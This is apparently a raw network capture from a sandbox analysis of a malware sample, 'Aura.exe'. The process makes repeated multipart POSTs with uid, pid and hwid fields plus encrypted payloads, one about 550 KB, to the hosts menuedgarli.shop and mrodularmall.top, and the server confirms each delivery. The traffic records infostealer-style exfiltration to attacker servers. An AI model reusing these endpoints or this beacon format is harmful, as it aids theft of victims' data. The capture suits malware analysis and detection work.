2025-03-12 20:42:23 UTC	8747	OUT	Data Raw: 2d 2d 39 6e 50 67 70 36 31 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 0d 0a 2d 2d 39 6e 50 67 70 36 31 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 6e 50 67 70 36 31 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 36 41 46 45 36 46 37 39 32 33 30 37 42 Data Ascii: --9nPgp61TGContent-Disposition: form-data; name="uid"f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e--9nPgp61TGContent-Disposition: form-data; name="pid"2--9nPgp61TGContent-Disposition: form-data; name="hwid"D2F6AFE6F792307B
2025-03-12 20:42:24 UTC	814	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e6eFC4jSIaZ79tM6g8X5kiUYXvRPKwDNYscnL4nm2AFpWUgKZUqktO1bF3d%2FoYsXuAFMXTkwwB%2BHf6AiP%2FvRI5lM68R0GTmTjvmNw%2FxZ1GiDo30mIWluxl2SFQZvgyjbJP6F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e2d1e43c25a-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18439&min_rtt=17986&rtt_var=7651&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9679&delivery_rate=133987&cwnd=251&unsent_bytes=0&cid=959f4fa68e1f1fad&ts=937&x=0"
2025-03-12 20:42:24 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 38 32 2e 35 30 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.182.50.10"}}
2025-03-12 20:42:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49728	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:26 UTC	279	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=dG9D2azB9oob6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20420 Host: menuedgarli.shop
2025-03-12 20:42:26 UTC	15331	OUT	Data Raw: 2d 2d 64 47 39 44 32 61 7a 42 39 6f 6f 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 0d 0a 2d 2d 64 47 39 44 32 61 7a 42 39 6f 6f 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 64 47 39 44 32 61 7a 42 39 6f 6f 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 36 Data Ascii: --dG9D2azB9oob6Content-Disposition: form-data; name="uid"f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e--dG9D2azB9oob6Content-Disposition: form-data; name="pid"3--dG9D2azB9oob6Content-Disposition: form-data; name="hwid"D2F6
2025-03-12 20:42:26 UTC	5089	OUT	Data Raw: e6 89 71 db cd 83 6b f3 7a 4f e7 33 5b e5 63 3a d6 e2 af 52 56 b9 a7 ed 43 68 dc 9d 24 9b e2 7c 5b 51 9b 59 44 58 f1 ab 68 e7 12 f9 88 f9 ef f4 bd b1 ee 09 c3 fe 51 09 6f c4 fe 5b 23 0a 8f f5 24 3e 6e fe 11 95 9c c9 d1 8c ef b1 cd 8a b2 7b e8 b3 6b a0 c1 2b 85 90 df 05 71 d0 a7 39 d5 b5 e8 3d b1 80 37 11 93 34 7d 92 56 6e b3 42 d6 3b 02 05 e0 3a db f7 ee 90 dc 42 78 d4 d8 44 cd 4c 62 cf 7b cf 1c af 41 1c 1b b1 3b 21 a6 8f c8 fd ad a9 24 91 0d 70 98 92 6c db 71 5c 5c 04 ee 4f b3 9f 21 03 03 83 46 4a 2f 50 d9 16 7f 87 ca d1 e0 4e f9 b9 04 25 69 50 88 ac fd 9c 50 d6 dd 70 6d 1c 36 6e f4 d7 89 2d 5a 30 68 81 3f b8 4d f0 89 fe 6a 3b c6 12 d1 3e 53 9c 0f ba 6f 6e e8 3c e8 4c 01 6d ff 99 57 a4 ba 85 61 62 50 1c 7e 21 bc 8c 8c 53 bf a3 27 bc 86 20 aa 6a 0e 1e 0e Data Ascii: qkzO3[c:RVCh$\|[QYDXhQo[#$>n{k+q9=74}VnB;:BxDLb{A;!$plq\\O!FJ/PN%iPPpm6n-Z0h?Mj;>Son<LmWabP~!S' j
2025-03-12 20:42:27 UTC	818	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xzq2SJe%2FnqqFwv801l55ow3u%2FbSA8VByVliYUT9xwnCNWX4xZDI6SbFY1VBykwuaubZfv%2F7b91PEFirYAvxyHS8ZfWOn4N%2BNa08uwfq4ZfXwc8HyYxYhh1Pp%2BWMnPOaw5mlS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e3fb812804f-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14903&min_rtt=14120&rtt_var=6862&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21379&delivery_rate=142030&cwnd=251&unsent_bytes=0&cid=9e44fb32060e1cc2&ts=965&x=0"
2025-03-12 20:42:27 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 38 32 2e 35 30 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.182.50.10"}}
2025-03-12 20:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49731	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:30 UTC	277	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7Dmdglwu1e80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2720 Host: menuedgarli.shop
2025-03-12 20:42:30 UTC	2720	OUT	Data Raw: 2d 2d 37 44 6d 64 67 6c 77 75 31 65 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 0d 0a 2d 2d 37 44 6d 64 67 6c 77 75 31 65 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 44 6d 64 67 6c 77 75 31 65 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 36 41 46 45 Data Ascii: --7Dmdglwu1e80Content-Disposition: form-data; name="uid"f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e--7Dmdglwu1e80Content-Disposition: form-data; name="pid"1--7Dmdglwu1e80Content-Disposition: form-data; name="hwid"D2F6AFE
2025-03-12 20:42:30 UTC	809	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XijIqHseORP9%2FtoyAnvNW1xEMUG9lRBtBig0U3O0ACQ4NNmLssTTlpa4izaq1M%2Bm8MTjm4d1jGyVSLmS8xUQlGMlBfGkZL1c0Izd13kGeHwUTqtr994EkHkKRJzIRLEkSTd7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e5309053382-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12529&min_rtt=12462&rtt_var=4808&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=3633&delivery_rate=222734&cwnd=251&unsent_bytes=0&cid=60e97411152921c3&ts=660&x=0"
2025-03-12 20:42:30 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 38 32 2e 35 30 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.182.50.10"}}
2025-03-12 20:42:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49732	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:32 UTC	280	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=e195wUQg5Q2PJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 550893 Host: menuedgarli.shop
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 2d 2d 65 31 39 35 77 55 51 67 35 51 32 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 0d 0a 2d 2d 65 31 39 35 77 55 51 67 35 51 32 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 65 31 39 35 77 55 51 67 35 51 32 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 46 36 Data Ascii: --e195wUQg5Q2PJContent-Disposition: form-data; name="uid"f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e--e195wUQg5Q2PJContent-Disposition: form-data; name="pid"1--e195wUQg5Q2PJContent-Disposition: form-data; name="hwid"D2F6
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 4b 05 eb 06 72 52 a6 3f af c6 f5 3b 1b 2d eb 07 90 1e 32 92 a4 27 31 20 d8 4d 50 e3 51 74 02 14 e7 86 46 cb 95 82 37 52 23 aa 10 94 cf dc b0 94 2e eb ef e9 ed 61 76 89 de 41 91 e6 8b 0c 9c ae 7d 64 57 14 c0 4d cd 04 18 0a c1 ba bc 28 fa e4 33 d9 f8 e8 bc 71 73 94 1b 5b fa 9f c1 bf c5 a0 f6 95 f5 9a 44 87 7c 35 6d 14 62 46 2f 54 3e 8e 5f 02 82 c2 91 5f 5b f0 be 74 7b a7 c8 83 87 93 ac 9e 46 8a 1b 69 a0 7b cd d2 42 1f d1 e8 d1 0c 70 da e0 2f 48 80 f3 93 c9 27 b2 db 2f 47 49 ed 37 db 8b ce 2c 05 98 e7 a7 8b 4f e7 ff f3 ee d5 e0 7b e6 bc 5c 4c 50 44 a8 bb a0 bd d1 4b 6c be 2f 4e 6f 0d 8e a1 ce 77 bc fb 14 38 05 55 c1 66 86 8d 4a 36 d7 05 3b a4 ba 59 68 11 a9 f4 ae 29 db 3f 7f d9 f6 cb 61 5a 6c ba 54 fb 64 1b c3 df 21 c0 a8 f4 93 0b b4 3c 09 e2 ac c5 0a db e9 Data Ascii: KrR?;-2'1 MPQtF7R#.avA}dWM(3qs[D\|5mbF/T>__[t{Fi{Bp/H'/GI7,O{\LPDKl/Now8UfJ6;Yh)?aZlTd!<
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 7f d5 67 5b 85 e7 fe 16 cc f3 c2 00 97 a0 d4 b9 c3 b4 68 ce 11 31 95 90 65 72 ba c5 06 4f f1 e1 9c ea cb c3 85 87 4d 9b 60 86 d6 0a 8e b2 35 84 02 3f e2 84 51 d3 77 74 c6 1d e8 37 01 0b 91 2f 87 77 38 29 fe db 0e b2 e1 56 49 24 1c 7a 56 b2 92 a2 d0 70 84 b5 de fe 97 44 94 39 a3 49 fc 87 1e 25 38 7a 06 c1 d0 92 b0 5e 9d b3 70 f3 51 5c 7b a4 80 d1 03 fb 57 55 d3 ff fc eb b9 58 44 4c 85 67 bf c1 11 c9 22 42 c3 12 ef e8 b0 ba 5b 1a 58 af ae e2 09 09 35 db 05 27 ef 04 b3 a6 ac 88 ee ea 97 33 c0 db 47 4b 7c 47 64 38 ef 67 81 2e 24 36 82 45 0b d4 d7 4b 42 59 95 df 14 b5 09 f5 ff 7b e4 24 26 98 77 a8 b3 75 14 fd 55 db 55 47 a6 52 c1 2b ec d5 63 01 99 c6 ab 82 83 3a 7d a8 7e e6 76 e8 07 94 85 e9 0b 29 60 04 1a 23 6b 07 6f 1f 1b 8a 73 31 d4 70 90 1f 53 e2 e4 cd 72 Data Ascii: g[h1erOM`5?Qwt7/w8)VI$zVpD9I%8z^pQ\{WUXDLg"B[X5'3GK\|Gd8g.$6EKBY{$&wuUUGR+c:}~v)`#kos1pSr
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 07 1a 75 fe 8e 50 18 35 21 a2 9a 49 4e 86 7e f4 b5 5e ce 2a 17 9f 75 cb 7b da b8 cb 7c 48 45 d1 f8 08 17 5a 10 5a 6a 3c dc b8 11 21 f6 0e 70 83 2d 91 e6 66 2c 7f d6 ed 9c c3 b8 2f 63 e3 c6 86 5b 49 9c 50 bb 99 41 5d ac 25 d7 68 b7 f4 91 8b ea 78 19 19 a7 c1 69 89 2e 8f 22 52 9a eb bf a7 be 57 32 37 e7 67 f0 b8 9f 57 45 41 e6 55 86 b0 d0 3f 8e 84 0f e0 97 bd 94 cf f3 8d 44 ab 91 75 0a 3a 78 e8 23 f3 ec bb b7 c8 b7 ea f2 00 fb a0 6e c1 46 95 06 c1 24 f7 61 98 3b cc 88 ee c7 ec a6 dd 56 49 8a af f2 cb 82 eb b8 fd 2a 34 b2 2c be 16 8d 1a a9 7e 2b f5 f5 d0 e9 97 e8 21 af 82 f6 e0 73 a9 44 c4 50 73 fd 8b e7 f5 ec 8d 24 1c 15 da 17 7e 5c 9f a4 37 52 1f f2 24 f8 55 83 c9 fe 1d 4e 89 17 72 b1 7e 40 20 71 f8 49 51 72 d3 06 42 80 b9 dd 5b 98 30 bd 20 39 37 14 f1 f3 Data Ascii: uP5!IN~^u{\|HEZZj<!p-f,/c[IPA]%hxi."RW27gWEAU?Du:x#nF$a;VI4,~+!sDPs$~\7R$UNr~@ qIQrB[0 97
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 36 d4 14 36 21 dd 3a cf 81 48 24 ba 67 bf 31 2a a7 9c 5d a0 a2 d7 3c cc 5f 23 67 0e f9 c1 27 60 e6 cd 3f 34 3c 9f 3b ed f9 b1 49 93 69 27 94 9b 76 cb a1 3b de ee fb 40 16 b1 21 57 94 42 a1 72 3d 7f a6 c1 8a 4d 95 5d e0 22 d3 4d a6 d7 d8 8a ff 83 b6 dc be 7c 71 a7 06 55 0b e5 d2 86 54 f9 3e 5d b1 cf 86 50 e5 b0 c1 b4 11 3c 4f 04 cf 05 b5 c5 79 c7 eb 5b 46 4c 93 39 c7 18 8d 00 f0 ec a1 e6 3b 55 47 7d 2d 16 27 ad 20 9b 18 0b 23 f8 4d 25 cb 58 ea 7d 53 a4 89 90 4a 53 05 af 9b ae 55 64 23 23 17 92 09 12 fd a9 d3 3e c5 f6 0e 01 b7 17 a5 a1 b2 b5 fd 7e 58 4d 48 4e fa 23 7b b9 d6 c5 cf d3 5b 1e e9 42 d9 16 52 ca f8 34 7d 1b 1c 2f 60 ea d4 c9 25 b1 56 40 ed 16 e0 8c 2b 22 d3 80 11 a7 51 3a e7 6e f9 f7 a0 4b b2 78 9a d1 00 ee a1 ae 4a 7f a7 87 34 01 56 c2 29 99 1f Data Ascii: 66!:H$g1*]<_#g'`?4<;Ii'v;@!WBr=M]"M\|qUT>]P<Oy[FL9;UG}-' #M%X}SJSUd##>~XMHN#{[BR4}/`%V@+"Q:nKxJ4V)
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 52 c5 ed fc 44 65 ec 7d 46 bd b5 f4 71 67 92 69 b9 50 05 2b 60 42 50 3d d4 e7 23 83 24 a5 f4 40 af 47 96 9e 23 bb e2 3a 70 4e b7 49 9f 28 9f 6f 26 97 51 5d a5 1e 85 17 dd 46 85 27 21 45 fe 48 cb e9 94 9f cd 93 02 bd a5 50 bb 07 c3 4f 87 77 c1 98 86 d5 71 55 a7 d2 74 c7 b0 62 18 fe a4 0a 5d 3e 07 f4 7e b8 fd 03 70 62 ca f4 00 4b 86 ea c3 32 2d 4b 47 3f 75 d1 37 cd c9 4b 64 0f bf 0d 17 c8 86 1a ed 0c 00 ab 44 e6 fa aa f4 c7 5d 9f 39 7b f7 10 ce 42 22 4d d9 6b dd 17 c7 7a 99 ae ee f0 69 7e bb 9f 13 c1 60 e3 1f dd 2e f0 ea 96 fc 9e 8c 7c 27 bd 55 55 6f f0 c1 ce 74 e7 a9 27 24 0b f4 b7 f9 39 7a 64 d6 d3 0d 4e 0c af 92 96 4a 61 ae c7 d0 f5 8d 1b 0b 19 ca 57 32 d0 8d 67 20 17 d8 a4 73 02 8e 25 23 9b 76 f2 a1 ca fd 6b fc 21 f0 6e fb 7c 42 dc ae f7 f0 bd af 66 bf Data Ascii: RDe}FqgiP+`BP=#$@G#:pNI(o&Q]F'!EHPOwqUtb]>~pbK2-KG?u7KdD]9{B"Mkzi~`.\|'UUot'$9zdNJaW2g s%#vk!n\|Bf
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 04 0d 30 c9 08 6c 9b 81 64 e6 19 3e 9e 6f ac 04 c8 f7 9d d1 7f c0 1a a4 87 57 4d 49 cc 8b 5a 68 6d 33 a4 35 0d d8 ab 7f ac f4 fa ed aa a1 02 e6 cc d0 48 4f bb 5d c7 a8 df eb 6a 8a f6 57 db 47 22 ca e5 5a 7f cb 29 78 d4 74 88 f5 d3 50 ae 5b 2a 3a 13 2a 06 8b 50 bf b0 10 0c d9 13 45 f9 84 51 25 b2 4a 7c 5f ff 6b 0f ab d9 61 ad a1 8d c1 d0 21 78 8f b1 8d 18 3a 3d 94 24 5d 63 c7 6d 12 3a 47 9b a0 b8 27 9e df a2 26 50 79 ea 7f e7 1d 8f e7 a2 3c f7 88 3e 09 63 3b 7a 06 99 44 9f db 82 d8 61 4d d5 16 9b 4e 54 33 2d 23 3f 04 22 5d d4 d9 6d 21 ed ab 86 6d 09 b1 ea d3 4f 91 c8 a1 1e a2 d0 fd eb 02 df 81 d6 ee 56 74 70 c2 1c ea 49 ae 3b c5 01 32 f4 29 79 6b f7 6e 5a 82 d9 ac 02 ec b0 e9 4c c9 8e bb e0 7e 67 10 e6 8c 9a 39 53 3a 54 20 9d be 83 62 43 4b 77 75 33 ec 59 Data Ascii: 0ld>oWMIZhm35HO]jWG"Z)xtP[:PEQ%J\|_ka!x:=$]cm:G'&Py<>c;zDaMNT3-#?"]m!mOVtpI;2)yknZL~g9S:T bCKwu3Y
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 2c 33 01 75 d1 59 32 d6 4b 1f 79 42 dc 35 4f 16 d7 1a 8a 5c c3 a9 21 41 9b 58 1f f6 e5 7e 45 dc 0f d4 78 9c 5a 91 e6 33 db 78 00 1a 26 5b 6a 94 68 69 78 30 4c 18 6f 03 3b ff 2a 71 89 2a 3e 2c 69 71 e5 6c af 7c be 3a 5b d9 70 02 1a 5a 9e c2 41 a0 5f 29 5a 38 55 c4 93 99 a3 e3 44 80 0c 1c 33 60 e1 20 cd 56 93 c1 3d 24 47 3f 26 5c 45 e5 43 1c 34 b3 9e e5 6f e6 53 76 50 4a 8d b6 db 83 26 f6 ba bc 7a 5e 55 c2 e7 9e 80 86 02 d8 8c e9 6a ce b2 00 2f ac f6 82 e7 c6 9a 2c ff c7 0a 8e 39 a6 22 d3 12 1b f1 d4 97 3c b4 7d 1f 8c d2 77 90 0e 80 a5 9c bd 23 82 2f ac e3 0c de 7e 6b 99 92 dc 56 c6 31 b1 1d 76 68 29 2f ad 3f 9a 73 f6 24 99 4a a5 b6 4a 45 00 d1 3c 07 95 18 89 30 3a 27 41 df 7a 61 a9 1e 15 77 5e 1f 21 0e 11 31 53 fe de a5 10 f2 a4 01 63 f0 ce ea b1 ed a3 26 Data Ascii: ,3uY2KyB5O\!AX~ExZ3x&[jhix0Lo;q>,iql\|:[pZA_)Z8UD3` V=$G?&\EC4oSvPJ&z^Uj/,9"<}w#/~kV1vh)/?s$JJE<0:'Azaw^!1Sc&
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 22 65 da 74 57 ab 9e da f3 6e 43 09 99 ad c6 4c eb bd 4c 04 72 f1 5b ef 3f 8c 43 71 a7 32 47 1c 6c f0 47 61 e7 61 93 fb 1f 1b a4 d2 11 db 92 74 33 3d 04 28 8f 09 14 0a eb 78 73 ba 9e f1 9d 9c 54 a9 4e fc f0 3f 79 26 58 35 18 f6 4a fc 0f cd 29 89 6c 58 d1 89 6c a6 6d 5b 8b eb 78 e7 26 62 d3 41 aa d1 25 5d be 93 5d 9c b3 4d 5a fe c5 49 54 86 7d dd f3 9d 14 4a 17 8b 64 ed 53 b8 35 f4 83 86 18 4b 92 e2 01 63 37 0d b1 21 df 8c b4 05 5c 11 cf b4 68 1a 37 94 6f 03 34 a4 ed b8 49 9d 2c c9 ec b6 42 bb 21 28 70 f1 07 d2 29 1f aa 0b f4 9b d3 67 08 e0 da 7e 0d 79 39 b2 0d 6f b0 e0 eb da 94 28 11 df 66 1a b7 fb 9b d5 9b ce 66 34 53 57 38 24 32 15 06 4a d9 9f 59 db 38 15 32 47 33 84 c2 6a 45 77 95 37 a1 76 bd ed b7 fe fd e5 b9 3c b5 c3 7d 0f 35 32 4c 5f fa e9 96 c7 62 Data Ascii: "etWnCLLr[?Cq2GlGaat3=(xsTN?y&X5J)lXlm[x&bA%]]MZIT}JdS5Kc7!\h7o4I,B!(p)g~y9o(ff4SW8$2JY82G3jEw7v<}52L_b
2025-03-12 20:42:32 UTC	15331	OUT	Data Raw: 83 e7 4c da ef 42 64 35 15 8c ec 42 1e cf 5e bf 90 22 ba c5 49 8c f4 13 58 20 3e 2c 76 5f 88 95 8f 86 2d a3 fb 8b 05 77 f0 cb 52 a6 95 cb 0a 67 7c db d4 1e 0b 5c b1 fd 93 ad a8 ad c6 43 73 1f a3 2b 3b 57 df c2 2c 10 86 f5 8b 9f be 39 4e 7f 9c 3f bd 15 cd a7 07 42 af 77 23 a5 b9 b5 b2 2b 0d c2 96 26 45 84 c6 4d 1b 5d f4 62 aa 96 a0 6d 01 63 75 5e 99 ed fc 6b 88 9e 6c 94 a2 e5 b8 ad c1 d9 cf c3 ae 9b 63 e9 c5 9a ed f7 80 56 4c 69 78 02 89 05 17 f2 b8 0e e9 64 24 ea 9b fd 26 c5 2d c5 71 02 99 37 06 fb fc 80 7e e5 97 84 55 b8 11 a2 c5 87 6a 5b 25 b3 68 6f 59 0b 9d 21 a5 a4 40 da 1a 45 de 3a 72 a0 ec 26 fd bc 6d fb 50 a8 0f 2d 94 0a a8 5b 75 7d b3 52 11 5b a0 5a 7b 78 88 b1 f3 61 6b 3a 70 bf e4 77 ad 95 4f 99 79 b3 b9 13 d0 de 25 b5 91 63 dc 51 18 e0 e2 cf 9d Data Ascii: LBd5B^"IX >,v_-wRg\|\Cs+;W,9N?Bw#+&EM]bmcu^klcVLixd$&-q7~Uj[%hoY!@E:r&mP-[u}R[Z{xak:pwOy%cQ
2025-03-12 20:42:34 UTC	818	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSpyqHVtQg49JRJeHqfovkXKdEtx%2BBLtNMv8edUOkTcIjlezLXHup3peYQArwDQEkbuwLp%2FexgEAX0iIXQEwSwcgAXqfpyFibCmsPa5AVpPffJAAqJ4%2FGKCFcKiOBi5x2KVs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e649d1432f2-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13346&min_rtt=13072&rtt_var=5451&sent=211&recv=416&lost=0&retrans=0&sent_bytes=2839&recv_bytes=553371&delivery_rate=189640&cwnd=244&unsent_bytes=0&cid=97f9036222ca2463&ts=2061&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49734	104.21.48.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:38 UTC	266	OUT	POST /aNzS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 103 Host: mrodularmall.top
